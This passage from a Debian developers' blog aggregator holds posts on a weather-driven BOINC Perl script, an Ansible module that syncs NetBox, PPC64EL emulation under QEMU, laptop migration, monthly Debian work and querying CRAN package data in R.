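    ssh backup.example.com zfs recv -u backup/home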

5 January 2021

Russell Coker: Weather and Boinc

I just wrote a Perl script to look at the Australian Bureau of Meteorology pages to find the current temperature in an area and then adjust BOINC settings accordingly. The Perl script (in this post after the break, which shouldn't be in the RSS feed) takes the URL of a Bureau of Meteorology observation point as ARGV[0] and parses that to find the current (within the last hour) temperature. Then successive command line arguments are of the form 24:100 and 30:50, which indicate that below 24C 100% of CPU cores should be used and below 30C 50% of CPU cores should be used. In warm weather, having a couple of workstations in a room running BOINC (or any other CPU intensive task) will increase the temperature and also make excessive noise from cooling fans. To change the number of CPU cores used, the script changes /etc/boinc-client/global_prefs_override.xml and then tells BOINC to reload that config file. This code is a little ugly (it doesn't properly parse XML, it just replaces a line of text) and could fail on a valid configuration file that wasn't produced by the current BOINC code. The parsing of the BoM page is a little ugly too: it relies on the HTML code in the BoM page, so they could make a page that looks identical which breaks the parsing, or even a page that contains the same data but looks different. It would be nice if the BoM published some APIs for getting the weather. One thing that would be good is TXT records in the DNS. DNS supports caching with specified lifetime and is designed for high throughput in aggregate. If you had a million IoT devices polling the current temperature and forecasts every minute via DNS, the people running the servers wouldn't even notice the load, while a million devices polling a web based API would be a significant load. As an aside, I recommend playing nice and only running such a script every 30 minutes; the BoM page seems to be updated on the half hour, so I have my cron jobs running at 5 and 35 minutes past the hour. If this code works for you then that's great. If it merely acts as an inspiration for developing your own code then that's great too! BOINC users outside Australia could replace the code for getting meteorological data (or even interface to a digital thermometer). Australians who use other CPU intensive batch jobs could take the BoM parsing code and replace the BOINC related code. If you write scripts inspired by this, please blog about it and comment here with a link to your blog post.
#!/usr/bin/perl
use strict;
use Sys::Syslog;

# St Kilda Harbour RMYS
# http://www.bom.gov.au/products/IDV60901/IDV60901.95864.shtml
my $URL = $ARGV[0];

# fetch the observation page and skip ahead to the data table
open(IN, "wget -o /dev/null -O - $URL|") or die "Can't get $URL";
while(<IN>)
{
  if($_ =~ /tr class=.rowleftcolumn/)
  {
    last;
  }
}

# extract the cell contents for the given "t1-" header id, or undef
sub get_data
{
  if(not $_[0] =~ /headers=.t1-$_[1]/)
  {
    return undef;
  }
  $_[0] =~ s/^.*headers=.t1-$_[1]..//;
  $_[0] =~ s/<.td.*$//;
  return $_[0];
}

my @datetime;
my $cur_temp = -100;
while(<IN>)
{
  chomp;
  if($_ =~ /^<.tr>$/)
  {
    last;
  }
  my $res;
  if($res = get_data($_, "datetime"))
  {
    @datetime = split(/\//, $res);
  }
  elsif($res = get_data($_, "tmp"))
  {
    $cur_temp = $res;
  }
}
close(IN);
if($#datetime != 1 or $cur_temp == -100)
{
  die "Can't parse BOM data";
}

# sanity-check that the observation is recent enough to act on
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
if($mday - $datetime[0] > 1 or ($datetime[0] > $mday and $mday != 1))
{
  die "Date wrong\n";
}

my $mins;
my @timearr = split(/:/, $datetime[1]);
$mins = $timearr[0] * 60 + $timearr[1];
if($timearr[1] =~ /pm/)
{
  $mins += 720;
}
if($mday != $datetime[0])
{
  $mins += 1440;
}
if($mins + 60 < $hour * 60 + $min)
{
  die "page outdated\n";
}

# parse the threshold arguments (e.g. "24:100") into temperature => percent
my %temp_hash;
foreach ( @ARGV[1..$#ARGV] )
{
  my @tmparr = split(/:/, $_);
  $temp_hash{$tmparr[0]} = $tmparr[1];
}
my @temp_list = sort(keys(%temp_hash));
my $percent = 0;
my $i;
for($i = $#temp_list; $i >= 0 and $temp_list[$i] > $cur_temp; $i--)
{
  $percent = $temp_hash{$temp_list[$i]};
}

my $prefs = "/etc/boinc-client/global_prefs_override.xml";
open(IN, "<$prefs") or die "Can't read $prefs";
my @prefs_contents;
while(<IN>)
{
  push(@prefs_contents, $_);
}
close(IN);
openlog("boincmgr-cron", "", "daemon");

# skip the rewrite if the configured percentage is already correct
my @cpus_pct = grep(/max_ncpus_pct/, @prefs_contents);
my $cpus_line = $cpus_pct[0];
$cpus_line =~ s/..max_ncpus_pct.$//;
$cpus_line =~ s/^.*max_ncpus_pct.//;
if($cpus_line == $percent)
{
  syslog("info", "Temp $cur_temp" . "C, already set to $percent");
  exit 0;
}

open(OUT, ">$prefs.new") or die "Can't write $prefs.new";
for($i = 0; $i <= $#prefs_contents; $i++)
{
  if($prefs_contents[$i] =~ /max_ncpus_pct/)
  {
    print OUT "   <max_ncpus_pct>$percent.000000</max_ncpus_pct>\n";
  }
  else
  {
    print OUT $prefs_contents[$i];
  }
}
close(OUT);
rename "$prefs.new", "$prefs" or die "can't rename";
system("boinccmd --read_global_prefs_override");
syslog("info", "Temp $cur_temp" . "C, set percentage to $percent");

19 September 2020

Vincent Bernat: Syncing NetBox with a custom Ansible module

The netbox.netbox collection from Ansible Galaxy provides several modules to update NetBox objects:
- name: create a device in NetBox
  netbox_device:
    netbox_url: http://netbox.local
    netbox_token: s3cret
    data:
      name: to3-p14.sfo1.example.com
      device_type: QFX5110-48S
      device_role: Compute Switch
      site: SFO1
However, if NetBox is not your source of truth, you may want to ensure it stays in sync with your configuration management database by removing outdated devices or IP addresses. While it should be possible to glue together a playbook with a query, a loop and some filtering to delete unwanted elements, it feels clunky, inefficient and an abuse of YAML as a programming language. A specific Ansible module solves this issue and is likely more flexible.

Notice I recommend that you read Writing a custom Ansible module as an introduction, as well as Syncing MySQL tables for a first simpler example.

Code The module has the following signature and it syncs NetBox with the content of the provided YAML file:
netbox_sync:
  source: netbox.yaml
  api: https://netbox.example.com
  token: s3cret
The synchronized objects are:
  • sites,
  • manufacturers,
  • device types,
  • device roles,
  • devices, and
  • IP addresses.
In our environment, the YAML file is generated from our configuration management database and contains a set of devices and a list of IP addresses:
devices:
  ad2-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Cisco
     model: Catalyst 2960G-48TC-L
     role: net_tor_oob_switch
  to1-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Juniper
     model: QFX5110-48S
     role: net_tor_gpu_switch
# […]
ips:
  - device: ad2-p6.example.com
    ip: 172.31.115.18/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.115.33/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.254.33/32
    interface: lo0.0
# […]
The network team is not the sole tenant in NetBox. While adding new objects or modifying existing ones should be relatively safe, deleting unwanted objects can be risky. The module only deletes objects it did create or modify. To identify them, it marks them with a specific tag, cmdb. Most objects in NetBox accept tags.
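A side benefit of the tag is that the module's footprint is easy to inspect from outside Ansible; for example, a hedged spot check with curl against the NetBox REST API, reusing the URL and token from the example above:
# list the devices currently carrying the cmdb tag
curl -s -H "Authorization: Token s3cret" \
    "https://netbox.example.com/api/dcim/devices/?tag=cmdb"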

Module definition Starting from the skeleton described in the previous article, we define the module:
module_args = dict(
    source=dict(type='path', required=True),
    api=dict(type='str', required=True),
    token=dict(type='str', required=True, no_log=True),
    max_workers=dict(type='int', required=False, default=10)
)
result = dict(
    changed=False
)
module = AnsibleModule(
    argument_spec=module_args,
    supports_check_mode=True
)
It contains an additional optional argument defining the number of workers used to talk to NetBox, querying the existing objects in parallel to speed up execution.

Abstracting synchronization We need to synchronize different object types, but once we have a list of objects we want in NetBox, the grunt work is always the same:
  • check if the objects already exist,
  • retrieve them and put them in a form suitable for comparison,
  • retrieve the extra objects we don't want anymore,
  • compare the two sets, and
  • add missing objects, update existing ones, delete extra ones.
We code these behaviours into a Synchronizer abstract class. For each kind of object, a concrete class is built with the appropriate class attributes to tune its behaviour and a wanted() method to provide the objects we want. I am not explaining the abstract class code here. Have a look at the source if you want.

Synchronizing tags and tenants As a starter, here is how we define the class synchronizing the tags:
class SyncTags(Synchronizer):
    app = "extras"
    table = "tags"
    key = "name"
    def wanted(self):
        return  "cmdb": dict(
            slug="cmdb",
            color="8bc34a",
            description="synced by network CMDB") 
The app and table attributes define the NetBox objects we want to manipulate. The key attribute is used to determine how to look up existing objects. In this example, we want to look up tags using their names. The wanted() method is expected to return a dictionary mapping object keys to the list of wanted attributes. Here, the keys are tag names and we create only one tag, cmdb, with the provided slug, color and description. This is the tag we will use to mark the objects we create or modify. If the tag does not exist, it is created. If it exists, the provided attributes are updated. Other attributes are left untouched. We also want to create a specific tenant for objects accepting such an attribute (devices and IP addresses):
class SyncTenants(Synchronizer):
    app = "tenancy"
    table = "tenants"
    key = "name"
    def wanted(self):
        return  "Network": dict(slug="network",
                                description="Network team") 

Synchronizing sites We also need to synchronize the list of sites. This time, the wanted() method uses the information provided in the YAML file: it walks the devices and builds a set of datacenter names.
class SyncSites(Synchronizer):
    app = "dcim"
    table = "sites"
    key = "name"
    only_on_create = ("status", "slug")
    def wanted(self):
        result = set(details["datacenter"]
                     for details in self.source['devices'].values()
                     if "datacenter" in details)
        return {k: dict(slug=k,
                        status="planned")
                for k in result}
Thanks to the only_on_create attribute, the specified attributes are set when an object is created but are not updated afterwards, even if they differ. The goal of this synchronizer is mostly to collect the references to the different sites for the other objects.
>>> pprint(SyncSites(**sync_args).wanted())
{'sfo1': {'slug': 'sfo1', 'status': 'planned'},
 'chi1': {'slug': 'chi1', 'status': 'planned'},
 'nyc1': {'slug': 'nyc1', 'status': 'planned'}}
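As a sketch of how only_on_create can be honored during an update (updatable_attrs is a hypothetical helper, not the article's exact code), the listed attributes are simply dropped from the comparison once the object already exists:
def updatable_attrs(self, attrs, current):
    """Keep all attributes at creation; skip only_on_create ones later."""
    if current is None:
        return attrs
    return {k: v for k, v in attrs.items()
            if k not in self.only_on_create}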

Synchronizing manufacturers, device types and device roles The synchronization of manufacturers is pretty similar, except we do not use the only_on_create attribute:
class SyncManufacturers(Synchronizer):
    app = "dcim"
    table = "manufacturers"
    key = "name"
    def wanted(self):
        result = set(details["manufacturer"]
                     for details in self.source['devices'].values()
                     if "manufacturer" in details)
        return {k: {"slug": slugify(k)}
                for k in result}
Regarding the device types, we use the foreign attribute linking a NetBox attribute to the synchronizer handling it.
class SyncDeviceTypes(Synchronizer):
    app = "dcim"
    table = "device_types"
    key = "model"
    foreign = {"manufacturer": SyncManufacturers}
    def wanted(self):
        result = set((details["manufacturer"], details["model"])
                     for details in self.source['devices'].values()
                     if "model" in details)
        return {k[1]: dict(manufacturer=k[0],
                           slug=slugify(k[1]))
                for k in result}
The wanted() method refers to the manufacturer using its key attribute. In this case, this is the manufacturer name.
>>> pprint(SyncManufacturers(**sync_args).wanted())
{'Cisco': {'slug': 'cisco'},
 'Dell': {'slug': 'dell'},
 'Juniper': {'slug': 'juniper'}}
>>> pprint(SyncDeviceTypes(**sync_args).wanted())
{'ASR 9001': {'manufacturer': 'Cisco', 'slug': 'asr-9001'},
 'Catalyst 2960G-48TC-L': {'manufacturer': 'Cisco',
                           'slug': 'catalyst-2960g-48tc-l'},
 'MX10003': {'manufacturer': 'Juniper', 'slug': 'mx10003'},
 'QFX10002-36Q': {'manufacturer': 'Juniper', 'slug': 'qfx10002-36q'},
 'QFX10002-72Q': {'manufacturer': 'Juniper', 'slug': 'qfx10002-72q'},
 'QFX5110-32Q': {'manufacturer': 'Juniper', 'slug': 'qfx5110-32q'},
 'QFX5110-48S': {'manufacturer': 'Juniper', 'slug': 'qfx5110-48s'},
 'QFX5200-32C': {'manufacturer': 'Juniper', 'slug': 'qfx5200-32c'},
 'S4048-ON': {'manufacturer': 'Dell', 'slug': 's4048-on'},
 'S6010-ON': {'manufacturer': 'Dell', 'slug': 's6010-on'}}
The device roles are defined like this:
class SyncDeviceRoles(Synchronizer):
    app = "dcim"
    table = "device_roles"
    key = "name"
    def wanted(self):
        result = set(details["role"]
                     for details in self.source['devices'].values()
                     if "role" in details)
        return {k: dict(slug=slugify(k),
                        color="8bc34a")
                for k in result}

Synchronizing devices A device is mostly a name with references to a role, a model, a datacenter and a tenant. These references are declared as foreign keys using the synchronizers defined previously.
class SyncDevices(Synchronizer):
    app = "dcim"
    table = "devices"
    key = "name"
    foreign = {"device_role": SyncDeviceRoles,
               "device_type": SyncDeviceTypes,
               "site": SyncSites,
               "tenant": SyncTenants}
    remove_unused = 10
    def wanted(self):
        return {name: dict(device_role=details["role"],
                           device_type=details["model"],
                           site=details["datacenter"],
                           tenant="Network")
                for name, details in self.source['devices'].items()
                if {"datacenter", "model", "role"} <= set(details.keys())}
The remove_unused attribute is a safety: it makes the module fail if more than 10 devices would have to be deleted, as this may indicate a bug somewhere, unless one of your datacenters suddenly caught fire.
>>> pprint(SyncDevices(**sync_args).wanted())
{'ad2-p6.sfo1.example.com': {'device_role': 'net_tor_oob_switch',
                             'device_type': 'Catalyst 2960G-48TC-L',
                             'site': 'sfo1',
                             'tenant': 'Network'},
 'to1-p6.sfo1.example.com': {'device_role': 'net_tor_gpu_switch',
                             'device_type': 'QFX5110-48S',
                             'site': 'sfo1',
                             'tenant': 'Network'},
[…]
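A sketch of how such a deletion threshold can be enforced (check_remove_unused is a hypothetical helper; the real check lives in the abstract class, and AnsibleError is the exception the module catches later):
def check_remove_unused(self, extra):
    """Refuse to proceed when too many deletions are requested."""
    if self.remove_unused and len(extra) > self.remove_unused:
        raise AnsibleError(
            f"refusing to delete {len(extra)} {self.table} objects: "
            f"above safety threshold ({self.remove_unused})")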

Synchronizing IP addresses The last step is to synchronize IP addresses. We do not attach them to a device.2 Instead, we specify the device names in the description of the IP address:
class SyncIPs(Synchronizer):
    app = "ipam"
    table = "ip-addresses"
    key = "address"
    foreign = {"tenant": SyncTenants}
    remove_unused = 1000
    def wanted(self):
        wanted = {}
        for details in self.source['ips']:
            if details['ip'] in wanted:
                wanted[details['ip']]['description'] = \
                    f"{details['device']} (and others)"
            else:
                wanted[details['ip']] = dict(
                    tenant="Network",
                    status="active",
                    dns_name="",        # information is present in DNS
                    description=f"{details['device']}: {details['interface']}",
                    role=None,
                    vrf=None)
        return wanted
There is a slight difficulty: NetBox allows duplicate IP addresses, so a simple lookup is not enough. In case of multiple matches, we choose the best by preferring those tagged with cmdb, then those already attached to an interface:
def get(self, key):
    """Grab IP address from NetBox."""
    # There may be duplicates. We need to grab the "best".
    results = super(Synchronizer, self).get(key)
    if len(results) == 0:
        return None
    if len(results) == 1:
        return results[0]
    scores = [0]*len(results)
    for idx, result in enumerate(results):
        if "cmdb" in result.tags:
            scores[idx] += 10
        if result.interface is not None:
            scores[idx] += 5
    return sorted(zip(scores, results),
                  reverse=True, key=lambda k: k[0])[0][1]

Getting the current and wanted states Each synchronizer is initialized with a reference to the Ansible module, a reference to pynetbox's API object, the data contained in the provided YAML file, and two empty dictionaries for the current and expected states:
import yaml
import pynetbox

source = yaml.safe_load(open(module.params['source']))
netbox = pynetbox.api(module.params['api'],
                      token=module.params['token'])
sync_args = dict(
    module=module,
    netbox=netbox,
    source=source,
    before={},
    after={}
)
synchronizers = [synchronizer(**sync_args) for synchronizer in [
    SyncTags,
    SyncTenants,
    SyncSites,
    SyncManufacturers,
    SyncDeviceTypes,
    SyncDeviceRoles,
    SyncDevices,
    SyncIPs
]]
Each synchronizer has a prepare() method whose goal is to compute the current and wanted states. It returns True in case of a difference:
# Check what needs to be synchronized
try:
    for synchronizer in synchronizers:
        result['changed'] |= synchronizer.prepare()
except AnsibleError as e:
    result['msg'] = e.message
    module.fail_json(**result)

Applying changes Back to the skeleton described in the previous article, the last step is to apply the changes if there is a difference between these states. Each synchronizer registers the current and wanted states in sync_args["before"][table] and sync_args["after"][table] where table is the name of the table for a given NetBox object type. The diff object is a bit elaborate as it is built table by table. This enables Ansible to display the name of each table before the diff representation:
# Compute the diff
if module._diff and result['changed']:
    result['diff'] = [
        dict(
            before_header=table,
            after_header=table,
            before=yaml.safe_dump(sync_args["before"][table]),
            after=yaml.safe_dump(sync_args["after"][table]))
        for table in sync_args["after"]
        if sync_args["before"][table] != sync_args["after"][table]
    ]
# Stop here if check mode is enabled or if no change
if module.check_mode or not result['changed']:
    module.exit_json(**result)
Each synchronizer also exposes a synchronize() method to apply changes and a cleanup() method to delete unwanted objects. Order is important due to the relation between the objects.
# Synchronize
for synchronizer in synchronizers:
    synchronizer.synchronize()
for synchronizer in synchronizers[::-1]:
    synchronizer.cleanup()
module.exit_json(**result)

The complete code is available on GitHub. Compared to using the netbox.netbox collection, the logic is written in Python instead of trying to glue Ansible tasks together. I believe this is both more flexible and easier to read, notably when trying to delete outdated objects. While I did not test it, it should also be faster. An alternative would have been to reuse code from the netbox.netbox collection, as it contains similar primitives. Unfortunately, I didn't think of it until now.

  1. In my opinion, a good option for a source of truth is to use YAML files in a Git repository. You get versioning for free and people can get started with a text editor.
  2. This limitation is mostly due to laziness: we do not really care about this information. Our main motivation for putting IP addresses in NetBox is to keep track of the used IP addresses. However, if an IP address is already attached to an interface, we leave this association untouched.

14 July 2020

Russell Coker: Debian PPC64EL Emulation

In my post on Debian S390X Emulation [1] I mentioned having problems booting a Debian PPC64EL kernel under QEMU. Giovanni commented that they had PPC64EL working and gave a link to their site with Debian QEMU images for various architectures [2]. I tried their image, which worked, then tried mine again, which also worked; it seems that a recent update in Debian/Unstable fixed the bug that made QEMU not work with the PPC64EL kernel. Here are the instructions on how to do it. First you need to create a filesystem in an image file with commands like the following:
truncate -s 4g /vmstore/ppc
mkfs.ext4 /vmstore/ppc
mount -o loop /vmstore/ppc /mnt/tmp
Then visit the Debian Netinst page [3] to download the PPC64EL net install ISO, and loopback mount it somewhere convenient like /mnt/tmp2. The qemu-system-ppc package has the program for emulating a PPC64LE system; the qemu-user-static package has the program for emulating PPC64LE for a single program (i.e. a statically linked program or a chroot environment), which you need to run debootstrap. The following commands should be most of what you need.
apt install qemu-system-ppc qemu-user-static
update-binfmts --display
# qemu ppc64 needs exec stack to solve "Could not allocate dynamic translator buffer"
# so enable that on SE Linux systems
setsebool -P allow_execstack 1
debootstrap --foreign --arch=ppc64el --no-check-gpg buster /mnt/tmp file:///mnt/tmp2
chroot /mnt/tmp /debootstrap/debootstrap --second-stage
cat << END > /mnt/tmp/etc/apt/sources.list
deb http://mirror.internode.on.net/pub/debian/ buster main
deb http://security.debian.org/ buster/updates main
END
echo "APT::Install-Recommends False;" > /mnt/tmp/etc/apt/apt.conf
echo ppc64 > /mnt/tmp/etc/hostname
# /usr/bin/awk: error while loading shared libraries: cannot restore segment prot after reloc: Permission denied
# only needed for chroot
setsebool allow_execmod 1
chroot /mnt/tmp apt update
# why aren't they in the default install?
chroot /mnt/tmp apt install perl dialog
chroot /mnt/tmp apt dist-upgrade
chroot /mnt/tmp apt install bash-completion locales man-db openssh-server build-essential systemd-sysv ifupdown vim ca-certificates gnupg
# install kernel last because systemd install rebuilds initrd
chroot /mnt/tmp apt install linux-image-ppc64el
chroot /mnt/tmp dpkg-reconfigure locales
chroot /mnt/tmp passwd
cat << END > /mnt/tmp/etc/fstab
/dev/vda / ext4 noatime 0 0
#/dev/vdb none swap defaults 0 0
END
mkdir /mnt/tmp/root/.ssh
chmod 700 /mnt/tmp/root/.ssh
cp ~/.ssh/id_rsa.pub /mnt/tmp/root/.ssh/authorized_keys
chmod 600 /mnt/tmp/root/.ssh/authorized_keys
rm /mnt/tmp/vmlinux* /mnt/tmp/initrd*
mkdir /boot/ppc64
cp /mnt/tmp/boot/[vi]* /boot/ppc64
# clean up
umount /mnt/tmp
umount /mnt/tmp2
# setcap binary for starting bridged networking
setcap cap_net_admin+ep /usr/lib/qemu/qemu-bridge-helper
# afterwards set the access on /etc/qemu/bridge.conf so it can only
# be read by the user/group permitted to start qemu/kvm
echo "allow all" > /etc/qemu/bridge.conf
Here is an example script for starting kvm. It can be run by any user that can read /etc/qemu/bridge.conf.
#!/bin/bash
set -e
KERN="-kernel /boot/ppc64/vmlinux-4.19.0-9-powerpc64le -initrd /boot/ppc64/initrd.img-4.19.0-9-powerpc64le"
# single network device, can have multiple
NET="-device e1000,netdev=net0,mac=02:02:00:00:01:04 -netdev tap,id=net0,helper=/usr/lib/qemu/qemu-bridge-helper"
# random number generator for fast start of sshd etc
RNG="-object rng-random,filename=/dev/urandom,id=rng0 -device virtio-rng-pci,rng=rng0"
# I have lockdown because it does no harm now and is good for future kernels
# I enable SE Linux everywhere
KERNCMD="net.ifnames=0 noresume security=selinux root=/dev/vda ro lockdown=confidentiality"
kvm -drive format=raw,file=/vmstore/ppc64,if=virtio $RNG -nographic -m 1024 -smp 2 $KERN -curses -append "$KERNCMD" $NET

9 July 2020

Enrico Zini: Laptop migration

This laptop used to be extra-flat My laptop battery started to explode in slow motion. HP requires 10 business days to repair my laptop under warranty, and I cannot afford that length of downtime. Alternatively, HP quoted me 375 + VAT for on-site repairs, which I thought was very funny. For 376.55 + VAT, which is pretty much exactly the same amount, I instead bought a refurbished ThinkPad X240 with a dual-core i5, 8G of RAM, a 250G SSD, and a 1920x1080 IPS display, to use as a spare while my laptop is being repaired. I'd like to thank HP for giving me the opportunity to own a ThinkPad. Since I'm migrating my whole system to the spare and then (hopefully) back, I'm documenting what I need to be fully productive on new hardware. Install Debian A basic Debian netinst with no tasks selected is good enough to get going. Note that if wifi worked in the Debian Installer, it doesn't mean that it will work in the minimal system it installed. See here for instructions on quickly bringing up wifi on a newly installed minimal system. Copy /home A simple tar of /home is all I needed to copy my data over. A neat way to do it was connecting the two laptops with an ethernet cable and using netcat:
# On the source
tar -C / -zcf - home | nc -l -p 12345 -N
# On the target
nc 10.0.0.1 12345 | tar -C / -zxf -
Since the data travels unencrypted this way, don't do it over wifi. Install packages I maintain a few simple local metapackages that depend on the packages I usually use. I can just install those and let apt bring in their dependencies. For the build dependencies of the programs I develop, I use mk-build-deps from the devscripts package to create metapackages that make sure they are installed. Here's an extract from debian/control of the metapackage:
Source: enrico
Section: admin
Priority: optional
Maintainer: Enrico Zini <enrico@debian.org>
Build-Depends: debhelper (>= 11)
Standards-Version: 3.7.2.1
Package: enrico
Section: admin
Architecture: all
Depends:
  mc, mmv, moreutils, powertop, syncmaildir, notmuch,
  ncdu, vcsh, ddate, jq, git-annex, eatmydata,
  vdirsyncer, khal, etckeeper, moc, pwgen
Description: Enrico's working environment
Package: enrico-devel
Section: devel
Architecture: all
Depends:
  git, python3-git, git-svn, gitk, ansible, fabric,
  valgrind, kcachegrind, zeal, meld, d-feet, flake8, mypy, ipython3,
  strace, ltrace
Description: Enrico's development environment
Package: enrico-gui
Section: x11
Architecture: all
Depends:
  xclip, gnome-terminal, qalculate-gtk, liferea, gajim,
  mumble, sm, syncthing, virt-manager
Recommends: k3b
Description: Enrico's GUI environment
Package: enrico-sanity
Section: admin
Architecture: all
Conflicts: libapache2-mod-php, libapache2-mod-php5, php5, php5-cgi, php5-fpm, libapache2-mod-php7.0, php7.0, libphp7.0-embed, libphp-embed, libphp5-embed
Description: Enrico's sanity
 Metapackage with a list of packages that I do not want anywhere near my
 system.
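For the build-dependency metapackages mentioned above, a typical mk-build-deps invocation (a hedged example, run from a source tree, with sudo assumed available) looks like this:
mk-build-deps --install --root-cmd sudo --remove debian/control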
System-wide customizations I tend to avoid changing system-wide configuration as much as possible, so copying over /home and installing packages takes care of 99% of my needs. There are a few system-wide tweaks I cannot do without. For postfix, I have a little ansible playbook that takes care of it. Network Manager system connections need to be copied manually: a plain copy and a systemctl restart network-manager are enough. Note that Network Manager will ignore the files unless their owner and permissions are what it expects. Fine tuning Comparing the output of dpkg --get-selections between the old and the new system might highlight packages manually installed in a hurry and not added to the metapackages. Finally, what remains is fixing the sad state of mimetype associations, which seem to associate files with whatever application was installed last, the phases of the moon, and whichever option is the most annoying. Currently on my system, PDFs are opened in inkscape by xdg-open and in calibre by run-mailcap. Let's see how long it takes to figure this one out.
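A hedged example of that Network Manager step (paths are the Debian defaults; the backup location is hypothetical):
cp /backup/etc/NetworkManager/system-connections/* /etc/NetworkManager/system-connections/
chown root:root /etc/NetworkManager/system-connections/*
chmod 600 /etc/NetworkManager/system-connections/*
systemctl restart network-manager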

9 May 2020

Thorsten Alteholz: My Debian Activities in April 2020

FTP master This month I accepted 384 packages and rejected 47. The overall number of packages that got accepted was 457. Debian LTS This was my seventieth month doing some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. This month my overall workload was 28.75h. During that time I did LTS uploads of: […] As there have been lots of no-dsa CVEs I continued my work on wireshark. Last but not least I did some days of frontdesk duties. Debian ELTS This month was the twenty-second ELTS month. During my small allocated time I only uploaded: […] I also did some days of frontdesk duties. Other stuff Unfortunately this month again strange things happened outside Debian and I only got some stuff done. I improved packaging of […]. I sponsored uploads of […]. I uploaded the new package […]. On my Go challenge I uploaded:
golang-github-facebookgo-subset, golang-github-facebookgo-ensure, golang-github-shurcool-gopherjslib, golang-github-grafana-grafana-plugin-model, golang-github-crewjam-httperr, golang-github-hashicorp-terraform-svchost, golang-github-neelance-sourcemap, golang-github-neelance-astrewrite, golang-github-kisielk-gotool, golang-github-gopherjs-gopherjs, golang-github-yvasiyarov-newrelic-platform-go, golang-github-rhnvrm-simples3, golang-github-robfig-go-cache, golang-github-xorcare-pointer, golang-github-goburrow-serial

15 April 2017

Dirk Eddelbuettel: #5: Easy package information

Welcome to the fifth post in the recklessly rambling R rants series, or R4 for short. The third post showed an easy way to follow R development by monitoring (curated) changes on the NEWS file for the development version r-devel. As a concrete example, I mentioned that it has shown a nice new function (tools::CRAN_package_db()) coming up in R 3.4.0. Today we will build on that. Consider the following short snippet:
library(data.table)
getPkgInfo <- function() {
    if (exists("CRAN_package_db", where = asNamespace("tools"))) {
        dat <- tools::CRAN_package_db()
    } else {
        tf <- tempfile()
        download.file("https://cloud.r-project.org/src/contrib/PACKAGES.rds", tf, quiet=TRUE)
        dat <- readRDS(tf)              # r-devel can now readRDS off a URL too
    }
    dat <- as.data.frame(dat)
    setDT(dat)
    dat
}
It defines a simple function getPkgInfo() as a wrapper around said new function from R 3.4.0, i.e. tools::CRAN_package_db(), and a fallback alternative using a tempfile (in the automagically cleaned R temp directory) and an explicit download and read of the underlying RDS file. As an aside, just this week the r-devel NEWS told us that such readRDS() operations can now read directly from a URL connection. Very nice---as RDS is a fantastic file format when you are working in R. Anyway, back to the RDS file! The snippet above returns a data.table object with as many rows as there are packages on CRAN, and basically all their (parsed!!) DESCRIPTION info and then some. A gold mine! Consider this to see how many packages have a dependency (in the sense of Depends, Imports or LinkingTo, but not Suggests, because Suggests != Depends) on Rcpp:
R> dat <- getPkgInfo()
R> rcppRevDepInd <- as.integer(tools::dependsOnPkgs("Rcpp", recursive=FALSE, installed=dat))
R> length(rcppRevDepInd)
[1] 998
R>
So exciting---we will hit 1000 within days! But let's do some more analysis:
R> dat[ rcppRevDepInd, RcppRevDep := TRUE]  # set to TRUE for given set
R> dat[ RcppRevDep==TRUE, 1:2]
           Package Version
  1:      ABCoptim  0.14.0
  2: AbsFilterGSEA     1.5
  3:           acc   1.3.3
  4: accelerometry   2.2.5
  5:      acebayes   1.3.4
 ---                      
994:        yakmoR   0.1.1
995:  yCrypticRNAs  0.99.2
996:         yuima   1.5.9
997:           zic     0.9
998:       ziphsmm   1.0.4
R>
Here we index the reverse dependencies using the vector we had just computed, and then use that new variable to subset the data.table object. Given the aforementioned parsed information from all the DESCRIPTION files, we can learn more:
R> ## likely false entries
R> dat[ RcppRevDep==TRUE, ][NeedsCompilation!="yes", c(1:2,4)]
            Package Version                                                                         Depends
 1:         baitmet   1.0.0                                                           Rcpp, erah (>= 1.0.5)
 2:           bea.R   1.0.1                                                        R (>= 3.2.1), data.table
 3:            brms   1.6.0                     R (>= 3.2.0), Rcpp (>= 0.12.0), ggplot2 (>= 2.0.0), methods
 4: classifierplots   1.3.3                             R (>= 3.1), ggplot2 (>= 2.2), data.table (>= 1.10),
 5:           ctsem   2.3.1                                           R (>= 3.2.0), OpenMx (>= 2.3.0), Rcpp
 6:        DeLorean   1.2.4                                                  R (>= 3.0.2), Rcpp (>= 0.12.0)
 7:            erah   1.0.5                                                               R (>= 2.10), Rcpp
 8:             GxM     1.1                                                                              NA
 9:             hmi   0.6.3                                                                    R (>= 3.0.0)
10:        humarray     1.1 R (>= 3.2), NCmisc (>= 1.1.4), IRanges (>= 1.22.10),\nGenomicRanges (>= 1.16.4)
11:         iNextPD   0.3.2                                                                    R (>= 3.1.2)
12:          joinXL   1.0.1                                                                    R (>= 3.3.1)
13:            mafs   0.0.2                                                                              NA
14:            mlxR   3.1.0                                                           R (>= 3.0.1), ggplot2
15:    RmixmodCombi     1.0              R(>= 3.0.2), Rmixmod(>= 2.0.1), Rcpp(>= 0.8.0), methods,\ngraphics
16:             rrr   1.0.0                                                                    R (>= 3.2.0)
17:        UncerIn2     2.0                          R (>= 3.0.0), sp, RandomFields, automap, fields, gstat
R> 
There are a full seventeen packages which claim to depend on Rcpp while not having any compiled code of their own. That is likely false---but I keep them in my counts, however reluctantly. A CRAN-declared Depends: is a Depends:, after all. Another nice thing to look at is the total number of packages that declare that they need compilation:
R> ## number of packages with compiled code
R> dat[ , .(N=.N), by=NeedsCompilation]
   NeedsCompilation    N
1:               no 7625
2:              yes 2832
3:               No    1
R>
Isn't that awesome? It is 2832 out of (currently) 10458, or about 27.1%. Just over one in four. Now the 998 for Rcpp look even better as they are about 35% of all such packages. In order words, a little over one third of all packages with compiled code (which may be legacy C, Fortran or C++) use Rcpp. Wow. Before closing, one shoutout to Dirk Schumacher whose thankr which I made the center of the last post is now on CRAN. As a mighty fine and slim micropackage without external dependencies. Neat.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

30 January 2017

Shirish Agarwal: Different strokes

